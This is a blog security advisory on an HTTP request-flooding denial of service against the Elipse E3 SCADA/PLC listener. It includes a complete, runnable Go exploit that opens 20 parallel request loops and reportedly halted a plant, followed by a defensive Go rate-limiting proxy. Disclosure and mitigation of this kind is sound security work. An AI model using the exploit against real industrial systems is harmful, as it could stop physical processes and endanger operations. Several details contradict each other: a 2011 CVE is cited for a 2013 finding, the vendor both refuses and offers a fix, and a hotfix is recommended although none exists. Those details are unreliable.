Elipse E3 Scada PLC Denial Of Service
Source: firebitsbr.wordpress.com  Author: Firebits  Published: 2014-07-16
VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
HTTP request-flooding denial of service crashes the Elipse E3 SCADA PLC.

LEVEL: EXTREME
In tests authorized by the customer, we were able to stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is proprietary software.
E3 is a supervision and process-control system designed to meet current
requirements of connectivity, flexibility and reliability, which makes it
suited to critical systems (SCADA/PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: HTTP request-flooding denial of service (device crash) via the
'index.html' page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// 29-10-2013 11:42
// Hard lock DLL crash on Windows 2003 SP2 after about 20 concurrent request connections
// Exploit written in Go (golang.org)
// Exploit developed on Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go [http://<ip-elipse>:<port>/index.html]


// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
    "fmt"
    "io"
    "log"
    "net/http"
    "os"
    "sync"
    "sync/atomic"
)

// Number of parallel request loops; the advisory reports the crash at 20.
const workers = 20

func main() {
    // Elipse E3 web listener: http://<ip-elipse>:<port, default 1681>/index.html
    // Override the default target with the first command-line argument.
    target := "http://192.168.0.1:1681/index.html"
    if len(os.Args) > 1 {
        target = os.Args[1]
    }

    fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
    fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
    fmt.Println("29-10-2013 11:42")
    fmt.Println("mauro.risonho@gmail.com")
    fmt.Println("Hard lock DLL crash in Windows 2003 SP2 +")
    fmt.Println("20 request connections")
    fmt.Println("Target:", target)

    var count int64
    var wg sync.WaitGroup
    for i := 0; i < workers; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            for {
                // One full GET of index.html per iteration, 20 of them in flight at once.
                n := atomic.AddInt64(&count, 1)
                fmt.Println("Request:", n)

                res, err := http.Get(target)
                if err != nil {
                    // First failed request: the listener has stopped answering.
                    log.Fatal(err)
                }
                body, err := io.ReadAll(res.Body)
                res.Body.Close()
                if err != nil {
                    log.Fatal(err)
                }
                fmt.Printf("%s", body)
            }
        }()
    }
    wg.Wait()
}

Result: the listener crashes with 20 parallel requests.

Vendor Response:
The vendor stated that the attack surface is too small to warrant a fix,
and replied:

"Would it be possible for you to communicate the details of the test, so
we can arrange a hotfix?"

VSLA Virtual Security Labs Anywhere recommends applying the hotfix before
putting the hardware/software into a production environment.

Remediation Steps:
At the time of publication no official fix for these issues had been
released for Elipse E3. Administrators can mitigate them by defining rules
in a web application firewall (WAF) that limit the request rate and the
number of concurrent connections per client to the E3 web listener (default
TCP port 1681), and by restricting that port to the hosts that need it.
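The following is an added example of the WAF-style rule described above, written for this page and not code from the advisory or from Elipse. It is a small Go reverse proxy placed in front of the E3 web listener that caps, per client IP, the sustained request rate (token bucket), the burst, and above all the number of requests in flight, since the advisory reports the crash at about 20 concurrent requests. The target address 192.168.0.1:1681 is taken from the PoC; the proxy port 8080 and the thresholds (5 req/s, burst 10, 2 concurrent per client) are assumptions to be tuned to the real listener's capacity.

```go
package main

import (
	"log"
	"net"
	"net/http"
	"net/http/httputil"
	"net/url"
	"sync"
	"time"
)

// bucket is the per-client state: a token bucket for the request rate
// plus the number of requests currently being proxied for that client.
type bucket struct {
	tokens   float64
	last     time.Time
	inFlight int
}

// Limiter enforces, per client IP, a sustained rate, a burst allowance and
// a cap on concurrent (in-flight) requests. The concurrency cap is the rule
// that matters most against the flood described in the advisory.
type Limiter struct {
	mu          sync.Mutex
	ratePerSec  float64
	burst       float64
	maxInFlight int
	clients     map[string]*bucket
}

func NewLimiter(ratePerSec float64, burst, maxInFlight int) *Limiter {
	return &Limiter{
		ratePerSec:  ratePerSec,
		burst:       float64(burst),
		maxInFlight: maxInFlight,
		clients:     make(map[string]*bucket),
	}
}

// Acquire reports whether a request from ip may proceed at time now and,
// if so, consumes one token and reserves an in-flight slot (see Release).
func (l *Limiter) Acquire(ip string, now time.Time) bool {
	l.mu.Lock()
	defer l.mu.Unlock()
	b, ok := l.clients[ip]
	if !ok {
		b = &bucket{tokens: l.burst, last: now}
		l.clients[ip] = b
	}
	// Refill for the time elapsed since the last request, capped at burst.
	if elapsed := now.Sub(b.last).Seconds(); elapsed > 0 {
		b.tokens += elapsed * l.ratePerSec
		if b.tokens > l.burst {
			b.tokens = l.burst
		}
	}
	b.last = now
	if b.tokens < 1 || b.inFlight >= l.maxInFlight {
		return false
	}
	b.tokens--
	b.inFlight++
	return true
}

// Release frees the in-flight slot taken by a successful Acquire.
func (l *Limiter) Release(ip string) {
	l.mu.Lock()
	defer l.mu.Unlock()
	if b, ok := l.clients[ip]; ok && b.inFlight > 0 {
		b.inFlight--
	}
}

// clientIP strips the port from RemoteAddr. Behind a trusted load balancer
// the forwarded-for header would have to be consulted instead.
func clientIP(r *http.Request) string {
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		return r.RemoteAddr
	}
	return host
}

// Middleware rejects over-limit requests with 429 before they reach E3.
func (l *Limiter) Middleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		ip := clientIP(r)
		if !l.Acquire(ip, time.Now()) {
			w.Header().Set("Retry-After", "1")
			http.Error(w, "rate limited", http.StatusTooManyRequests)
			return
		}
		defer l.Release(ip)
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Assumed: E3 listener at 192.168.0.1:1681 (as in the PoC); the proxy on
	// :8080 should be the only host the firewall allows to reach port 1681.
	target, err := url.Parse("http://192.168.0.1:1681")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(target)
	limiter := NewLimiter(5, 10, 2) // hypothetical thresholds
	log.Fatal(http.ListenAndServe(":8080", limiter.Middleware(proxy)))
}
```

Run with `go run proxy.go` and point clients at port 8080; with the PoC's 20 workers only two requests per source reach E3 at a time, and the rest get 429 and a Retry-After header instead of queuing on the listener. A lone limit on requests per second is not enough here, because a slow backend lets a modest rate accumulate into many open connections; the in-flight cap is what bounds that.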

Vendor Communication Timeline:
10/24/2013 - Vulnerability disclosed
10/29/2013 - Confirmation to release vulnerabilities
? - Advisory published


References
1. http://www.elipse.com.br/port/e3.aspx


About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is an information security research
blog.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.



 